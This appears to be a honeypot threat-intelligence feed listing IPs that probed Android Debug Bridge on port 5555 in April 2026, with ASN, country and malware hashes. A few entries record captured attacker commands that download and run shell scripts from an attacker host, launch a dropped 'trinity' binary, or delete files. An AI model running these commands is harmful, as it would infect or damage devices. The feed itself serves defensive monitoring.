IPv4	218.205.95.163	Attacker IP • ADB / seen in ADBHoney; events=61; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; adb_cmd_hits=28; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=121 \| first_seen=2026-04-03T04:23:19.000Z \| last_seen=2026-04-26T08:32:47.257Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-03
IPv4	64.225.124.163	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-03T04:44:34.000Z \| last_seen=2026-04-03T04:45:44.126Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	117.111.5.199	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=KR; asn=17853; asn_org=LGTELECOM; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-03T05:43:08.000Z \| last_seen=2026-04-03T05:53:18.104Z \| ports=5555 \| cc=KR \| asn=17853 \| org=LGTELECOM	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	146.190.74.182	Attacker IP • ADB / seen in ADBHoney; events=285; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=285 \| first_seen=2026-04-03T05:12:58.000Z \| last_seen=2026-04-03T05:24:05.308Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	80.66.83.43	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RU; asn=216473; asn_org=Bashinskii Vadim Ruslanovich; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=79 \| first_seen=2026-04-03T05:52:22.000Z \| last_seen=2026-04-30T18:44:56.951Z \| ports=5555 \| cc=RU \| asn=216473 \| org=Bashinskii Vadim Ruslanovich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	64.62.197.107	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=32 \| first_seen=2026-04-03T06:06:31.000Z \| last_seen=2026-04-29T14:41:24.765Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	64.62.197.120	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-03T06:04:48.000Z \| last_seen=2026-04-03T06:05:53.488Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	176.65.139.52	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=21 \| first_seen=2026-04-03T07:18:57.000Z \| last_seen=2026-04-12T21:12:30.978Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	71.6.134.233	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-03T08:00:08.000Z \| last_seen=2026-04-03T09:03:09.567Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	66.132.195.156	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-03T09:02:36.000Z \| last_seen=2026-04-03T09:04:12.259Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	203.229.224.194	Attacker IP • ADB / seen in ADBHoney; events=65; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=131 \| first_seen=2026-04-03T10:24:00.000Z \| last_seen=2026-04-08T18:47:55.873Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-03
IPv4	185.242.3.160	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=60223; asn_org=Netiface Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-03T11:40:16.000Z \| last_seen=2026-04-03T11:41:19.048Z \| ports=5555 \| cc=NL \| asn=60223 \| org=Netiface Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	41.216.73.10	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=ZM; asn=36962; asn_org=MTN Zambia; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-03T11:26:38.000Z \| last_seen=2026-04-03T11:36:48.264Z \| ports=5555 \| cc=ZM \| asn=36962 \| org=MTN Zambia	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	65.49.1.222	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-03T11:58:39.000Z \| last_seen=2026-04-03T12:08:41.283Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	65.49.1.229	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-03T11:58:15.000Z \| last_seen=2026-04-03T11:59:18.890Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	100.31.129.171	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-03T12:56:55.000Z \| last_seen=2026-04-03T12:58:02.427Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	138.36.215.47	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=BR; asn=264590; asn_org=NAVEX TELECOM; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-03T12:06:30.000Z \| last_seen=2026-04-03T12:16:31.057Z \| ports=5555 \| cc=BR \| asn=264590 \| org=NAVEX TELECOM	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	165.227.170.229	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-03T17:40:06.000Z \| last_seen=2026-04-03T17:50:17.666Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	185.93.89.191	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=61 \| first_seen=2026-04-03T19:11:55.000Z \| last_seen=2026-04-21T19:42:07.435Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	185.93.89.192	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-03T19:12:03.000Z \| last_seen=2026-04-22T08:22:26.702Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	38.166.184.188	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=VE; asn=61461; asn_org=Airtek Solutions C.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-03T20:05:29.000Z \| last_seen=2026-04-03T20:15:34.083Z \| ports=5555 \| cc=VE \| asn=61461 \| org=Airtek Solutions C.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	34.222.128.90	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-03T22:16:42.000Z \| last_seen=2026-04-03T22:26:58.396Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	5.63.151.101	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=GB; asn=13213; asn_org=Thg Hosting Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-03T22:16:14.000Z \| last_seen=2026-04-03T22:17:21.009Z \| ports=5555 \| cc=GB \| asn=13213 \| org=Thg Hosting Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	172.105.186.117	Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; adb_cmd_hits=3 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-04T00:46:59.289Z \| last_seen=2026-04-15T14:57:37.838Z \| ports=5555 \| cc=AU \| asn=63949 \| org=Akamai Connected Cloud	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	194.88.98.82	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-04T00:37:03.000Z \| last_seen=2026-04-04T00:38:41.613Z \| ports=5555 \| cc=DE \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	194.88.98.84	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-04T00:36:51.000Z \| last_seen=2026-04-04T00:36:58.597Z \| ports=5555 \| cc=DE \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	181.119.67.222	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CO; asn=52468; asn_org=UFINET PANAMA S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T01:20:20.000Z \| last_seen=2026-04-04T01:30:29.004Z \| ports=5555 \| cc=CO \| asn=52468 \| org=UFINET PANAMA S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	66.132.172.183	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-04T01:48:06.000Z \| last_seen=2026-04-04T01:49:24.639Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	66.132.172.16	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-01T23:37:57.000Z \| last_seen=2026-04-04T02:08:22.273Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	66.132.195.86	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-04T02:06:59.000Z \| last_seen=2026-04-04T02:08:23.234Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	67.183.46.41	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T02:22:55.000Z \| last_seen=2026-04-04T02:32:57.255Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	181.191.27.105	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=AR; asn=52425; asn_org=RELTID CV S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T04:51:22.000Z \| last_seen=2026-04-04T05:01:27.160Z \| ports=5555 \| cc=AR \| asn=52425 \| org=RELTID CV S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	78.190.121.137	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=TR; asn=9121; asn_org=Turk Telekom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T04:19:35.000Z \| last_seen=2026-04-04T04:29:39.212Z \| ports=5555 \| cc=TR \| asn=9121 \| org=Turk Telekom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	148.3.31.205	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=ES; asn=12430; asn_org=Vodafone Spain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-04T05:07:17.000Z \| last_seen=2026-04-04T05:23:03.046Z \| ports=5555 \| cc=ES \| asn=12430 \| org=Vodafone Spain	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	103.75.11.76	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=NZ; asn=136557; asn_org=Host Universal Pty Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=69 \| first_seen=2026-04-04T06:11:44.000Z \| last_seen=2026-04-05T00:14:58.532Z \| ports=5555 \| cc=NZ \| asn=136557 \| org=Host Universal Pty Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	173.244.62.65	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=AU; asn=137409; asn_org=GSL Networks Pty LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=35 \| first_seen=2026-04-04T06:35:43.000Z \| last_seen=2026-04-04T06:56:56.419Z \| ports=5555 \| cc=AU \| asn=137409 \| org=GSL Networks Pty LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	173.40.144.163	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=20115; asn_org=Charter Communications LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-04T06:41:20.000Z \| last_seen=2026-04-04T06:51:20.960Z \| ports=5555 \| cc=US \| asn=20115 \| org=Charter Communications LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	176.65.139.102	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; cats=Generic Protocol Command Decode; adb_cmd_hits=8; cmd="cd /data/local/tmp/; busybox wget http://176.65.139.102/w.sh; sh w.sh; curl http://176.65.139.102/c.sh; sh c.sh; wget http://176.65.139.102/wget.sh; sh wget.sh;" Observed in ADBHoney telemetry for 2026-04. events=32 \| first_seen=2026-04-03T23:10:30.000Z \| last_seen=2026-04-04T18:08:08.104Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	43.106.19.224	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=39 \| first_seen=2026-04-04T07:08:00.000Z \| last_seen=2026-04-05T21:14:27.105Z \| ports=5555 \| cc=SG \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	161.97.173.12	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-04T08:07:12.000Z \| last_seen=2026-04-04T08:08:20.295Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	184.105.247.244	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-04T08:37:31.000Z \| last_seen=2026-04-04T08:38:33.794Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	184.105.247.254	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-04T08:38:42.000Z \| last_seen=2026-04-04T08:48:48.902Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	118.165.105.173	Attacker IP • ADB / seen in ADBHoney; events=33; ports=5555; cc=TW; asn=3462; asn_org=Data Communication Business Group; cats=Generic Protocol Command Decode; adb_cmd_hits=12; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-04. events=66 \| first_seen=2026-04-04T09:58:33.000Z \| last_seen=2026-04-04T10:11:42.685Z \| ports=5555 \| cc=TW \| asn=3462 \| org=Data Communication Business Group \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-04
IPv4	120.40.62.27	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-04T11:34:32.000Z \| last_seen=2026-04-04T11:35:36.134Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	37.10.113.210	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=GB; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=18 \| first_seen=2026-04-04T12:39:23.000Z \| last_seen=2026-04-04T22:09:50.451Z \| ports=5555 \| cc=GB \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	37.10.113.218	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=GB; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-04T12:39:17.000Z \| last_seen=2026-04-04T12:55:15.755Z \| ports=5555 \| cc=GB \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	37.10.113.222	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=GB; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-04T12:39:28.000Z \| last_seen=2026-04-04T22:19:30.772Z \| ports=5555 \| cc=GB \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	172.237.155.29	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-04T15:47:19.000Z \| last_seen=2026-04-04T15:48:20.224Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	27.19.232.14	Attacker IP • ADB / seen in ADBHoney; events=30; ports=5555; cc=CN; asn=137266; asn_org=CHINATELECOM Hubei province Wuhan 5G network; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-04. events=30 \| first_seen=2026-04-04T15:31:53.000Z \| last_seen=2026-04-04T15:47:01.629Z \| ports=5555 \| cc=CN \| asn=137266 \| org=CHINATELECOM Hubei province Wuhan 5G network \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-04
IPv4	198.235.24.202	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-04T19:10:09.000Z \| last_seen=2026-04-04T19:21:31.619Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	218.205.95.162	Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=175 \| first_seen=2026-04-04T19:26:36.000Z \| last_seen=2026-04-26T08:47:38.059Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-04
IPv4	14.152.90.227	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134763; asn_org=CHINANET Guangdong province network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-04T21:14:57.000Z \| last_seen=2026-04-04T21:16:05.467Z \| ports=5555 \| cc=CN \| asn=134763 \| org=CHINANET Guangdong province network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	186.79.130.111	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CL; asn=7418; asn_org=TELEFONICA CHILE S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T21:05:29.000Z \| last_seen=2026-04-04T21:15:30.665Z \| ports=5555 \| cc=CL \| asn=7418 \| org=TELEFONICA CHILE S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	196.75.113.32	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MA; asn=36903; asn_org=MT-MPLS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T21:24:55.000Z \| last_seen=2026-04-04T21:34:58.244Z \| ports=5555 \| cc=MA \| asn=36903 \| org=MT-MPLS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	68.35.144.220	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T21:37:15.000Z \| last_seen=2026-04-04T21:47:22.770Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	37.10.113.215	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=GB; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-04T22:03:26.000Z \| last_seen=2026-04-04T22:19:20.833Z \| ports=5555 \| cc=GB \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	37.10.113.220	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=GB; asn=25369; asn_org=Hydra Communications Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-04T22:03:31.000Z \| last_seen=2026-04-04T22:19:29.763Z \| ports=5555 \| cc=GB \| asn=25369 \| org=Hydra Communications Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-04
IPv4	181.118.147.27	Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=CO; asn=27951; asn_org=Media Commerce Partners S.A; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-04T23:52:31.000Z \| last_seen=2026-04-05T00:02:33.918Z \| ports=5555 \| cc=CO \| asn=27951 \| org=Media Commerce Partners S.A	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	45.55.214.20	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=20 \| first_seen=2026-04-05T00:47:49.000Z \| last_seen=2026-04-05T00:58:05.535Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-05
IPv4	119.203.55.5	Attacker IP • ADB / seen in ADBHoney; events=50; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=20; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=51 \| first_seen=2026-04-05T01:48:54.000Z \| last_seen=2026-04-05T02:00:51.747Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-05
